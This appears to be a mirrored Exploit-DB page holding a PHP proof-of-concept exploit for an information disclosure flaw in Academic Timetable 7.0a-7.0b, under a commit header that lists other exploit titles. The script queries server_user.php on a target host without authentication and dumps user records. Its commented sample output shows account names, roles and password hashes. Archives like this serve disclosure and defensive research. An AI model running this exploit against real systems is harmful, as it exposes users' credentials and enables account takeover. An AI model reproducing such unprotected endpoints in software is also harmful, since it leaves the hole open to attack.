bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/45612.php
Offensive Security 731dd0f423 DB: 2018-10-16 
22 changes to exploits/shellcodes

Snes9K 0.0.9z - Buffer Overflow (SEH)

NoMachine < 5.3.27 - Remote Code Execution

MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection
FLIR Brickstream 3D+ - RTSP Stream Disclosure
FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure

CAMALEON CMS 2.4 - Cross-Site Scripting
Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection
FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure
FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure
Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)
AlchemyCMS 4.1 - Cross-Site Scripting
FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution
College Notes Management System 1.0 - 'user' SQL Injection
Advanced HRM 1.6 - Remote Code Execution
Centos Web Panel 0.9.8.480 - Multiple Vulnerabilities
Academic Timetable Final Build 7.0 - Information Disclosure
KORA 2.7.0 - 'cid' SQL Injection
2018-10-16 05:01:45 +00:00

60 lines
No EOL
1.7 KiB
PHP
Raw Blame History

<?php
# Exploit Title: Academic Timetable Final Build 7.0a-7.0b - User Information Disclosure
# Dork: N/A
# Date: 2018-10-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://geoffpartridge.net/
# Software Link: https://sourceforge.net/projects/timetableacademic/files/latest/download
# Version: 7.0a-7.0b
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
header ('Content-type: text/html; charset=UTF-8');
$urlemiz= "http://192.168.1.27/[PATH]/";
$yuk="server_user.php?sEcho=10&iColumns=10&iDisplayStart=0&iDisplayLength=10&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSearchable_3=0";
$jsonveri = file_get_contents($urlemiz.$yuk);
$ver = json_decode($jsonveri,true);
echo "<pre>\n";
print_r($ver);
echo "\n</pre>";
/**
Array
(
[sEcho] => 10
[iTotalRecords] => 3
[iTotalDisplayRecords] => 3
[aaData] => Array
(
[0] => Array
(
[0] => testdb1
[1] => testdb1
[2] => ADMIN
[3] => *6CC4E8CFFEAF202D7475BC906612F9A29A9C8117
)
[1] => Array
(
[0] => ADMIN
[1] => admin
[2] => ADMIN
[3] => *4ACFE3202A5FF5CF467898FC58AAB1D615029441
)
[2] => Array
(
[0] => STAFF
[1] => Staff
[2] => VIEW
[3] =>
)
)
)
*/
?>
Reference in a new issue View git blame Copy permalink